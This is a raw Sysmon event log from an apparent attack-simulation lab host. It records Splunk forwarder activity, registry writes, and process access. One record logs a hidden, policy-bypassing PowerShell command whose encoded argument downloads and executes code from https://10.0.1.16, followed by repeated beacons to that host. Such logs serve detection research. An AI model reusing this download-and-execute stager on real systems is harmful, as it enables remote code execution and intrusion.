13:20:41.532{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50599-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:11.896{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDE6A7316EC3853872CEDCA7EE9E1251,SHA256=5D1565674F56F08F2EA11E1176DAE42395C40C32F7C7193725762BE6A7929B8A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:12.927{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89318A49CF7889BAC828EC4C0BD63263,SHA256=B9816E465A92C3C0EC3163543166CE2A45FB423DD49A9A64EACB86451AA68DA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:13.927{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79A10865A653A64CA50F74D19209837A,SHA256=CF2A7C7C705805A752C6BCB9EF1B17F941F0F7C70034B7D9A80C3E1BE65BB2F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:14.957{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38A13C16D6C874CD6C217F9474793B27,SHA256=0B9E22FE4436D1789063CF0694A39F92F914A32209AAB494E29B08837C996B45,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:15.976{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D95FBC7520CA0D4EAD5D68F3BFEA2849,SHA256=2EF93B240B07C935AAB2558533240C8D5C11BE0DC89BF7C9514FC802C29A7DCC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000036497983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:20:15.194{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000036497982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:20:15.194{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x8a355b51) 13241300x800000000000000036497981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:20:15.194{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a962-0xdfcca987) 13241300x800000000000000036497980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:20:15.194{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a96b-0x41911187) 13241300x800000000000000036497979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:20:15.194{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a973-0xa3557987) 13241300x800000000000000036497978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:20:15.194{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000036497977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:20:15.194{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x8a355b51) 13241300x800000000000000036497976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:20:15.194{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a962-0xdfcca987) 13241300x800000000000000036497975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:20:15.194{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a96b-0x41911187) 13241300x800000000000000036497974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:20:15.194{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a973-0xa3557987) 23542300x800000000000000036497986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:16.992{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=82CB9FBC86D541F3E45832E8F2C50DE6,SHA256=90C94D4AA18637B6C7790E8FD2EFED0401D71FFEB5DF4772406B295F58D4EC74,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:45.713{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50600-false10.0.1.12-8000- 23542300x800000000000000036497987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:17.024{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBAFF16AC368E6A4CCE4BEDC723FC929,SHA256=712BDE18736DC7B21F217B3C7A55BCBE542227A8D909EB3D2F68F9AB0EC946EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.543{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50601-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:18.073{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FDEEE1534E958691F3D3E924A5F2794,SHA256=E848F40F6025E5342FEB06508BECFF85117BE5B13D32661D8D12444DD6E5A963,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:19.079{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A44BA62DE8F859E9F2EC7756F2CA0DE,SHA256=05A893093EB3DD01E3D182B8B5A3DFF3C4F17F25C01BAE8F7ECE5B4B784971FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:50.716{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50602-false10.0.1.12-8000- 10341000x800000000000000036498000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:20.912{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A194-6140-9656-04000000C801}5924C:\Windows\system32\ipconfig.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:20.896{B81B27B7-4012-611D-1400-00000000C801}8844756C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:20.881{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:20.881{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:20.881{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:20.881{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:20.881{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-A194-6140-9656-04000000C801}5924C:\Windows\system32\ipconfig.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:20.881{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-A194-6140-9656-04000000C801}5924C:\Windows\system32\ipconfig.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000036497992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:20.882{B81B27B7-A194-6140-9656-04000000C801}5924C:\Windows\System32\ipconfig.exe10.0.14393.0 (rs1_release.160715-1616)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exe"C:\Windows\system32\ipconfig.exe"C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=29916DCEA5377C19996B417D9235F42F,SHA256=5EE3FD7CA1AC876D0DE539D469BFC333594FCA3DF9F377CC96C756D9648697F1,IMPHASH=3636F50089F8190E3308E8AEA8F2043A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000036497991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:20.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6BF47C839C0B1D7448A3CD202C72AC5,SHA256=0799AA00D73A5F59FEA4A77446BE09D05839E2CEDE9A5BD28BA1F970E9B1856B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:21.912{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28A17D44E2D7DFEB085D96DF0E95D9B6,SHA256=A4ECE226B12571329C0EFA87082A5055465C7A0BA3E268EA8067A37D9D66A8FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:21.912{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3357F53858A2A3F9698DCFD110EAA3C0,SHA256=D8FD2C1DF0E380A0B5744B7E4B594451D659B9DEF2D610E73638DBDAE0FDF5BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:21.163{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=203B69F7BE8CF9755FC458EA838E5066,SHA256=1D9D79FA784F9F387228BB8ED0BFF01965531A096DDC670732603BF46D59932F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:22.164{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77CA612DAB6B97B10AE241143C7C6884,SHA256=210D9C71B273540982711866643BB7F88EA292FE364BF7A95331728BBE75A09F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:52.546{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50603-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:21.996{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AFBB5E05B00A4A68FD3E3930F886B6EF,SHA256=01CC3887566C16017C194107E414A60CEEB457FC0B0D6A4357BF4DF26A4FD3D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:23.263{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CD5861B45494142F6FD210E40BED25F6,SHA256=7E317373D55A5A4A5291C948F5973F82D6FE5867A7462A199537B0D69A41D3E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:23.179{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70307485CCD931E888C0E9A8A3BE7FFD,SHA256=E33D805C254B1DBED020F0532C407E14B2C8091A6A508E5C1DC53E14DFCFAECB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:52.804{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50604-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036498028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:24.778{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A198-6140-9856-04000000C801}3324C:\Program 